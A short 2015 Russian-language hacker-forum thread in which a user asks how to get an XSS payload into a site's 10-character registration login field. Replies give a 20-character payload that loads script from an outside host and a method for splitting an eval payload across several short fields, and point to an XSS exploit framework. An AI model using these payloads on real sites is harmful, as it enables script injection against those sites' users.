Про xss

Discussion in 'Песочница' started by SaNDER, 2 Aug 2015.

  1. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    А вот если например на сайте при регистрации можно вводить в поле логин: <script>alert</script>
    Есть вероятность что он сработает ? И можно ли сделать что-то? . Ой проблема больше 10 символов нельзя,можно ли как то укоротить ? .
     
    #1 SaNDER, 2 Aug 2015
    Last edited: 2 Aug 2015
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    alert()
    вектора в 10 символов не бывает.
     
    _________________________
    #2 yarbabin, 2 Aug 2015
    SaNDER likes this.
  3. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    yarbabin, Можно уложиться в 20 символов:
    Code:
    <script/src=//ab.ru>
    Можно уложиться в 10 за несколько раз:
    Code:
    <script>/*
*/eval(/*
*/'zzz'+/*
*/'zzz'+/*
...
*/'zzzz'/*
*/+'z');/*
*/</script
    Официальная теория на сегодняшний день не предлагает ничего больше.
     
    #3 randman, 2 Aug 2015
  4. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,109
    Likes Received:
    828
    Reputations:
    231
    Вот посмотри софт http://xenotix.in/
    https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework
    и видео по нему
    Code:
    https://www.youtube.com/user/ajinabrahamofficial/videos
     
    _________________________
    #4 grimnir, 2 Aug 2015
(You must log in or sign up to post here.)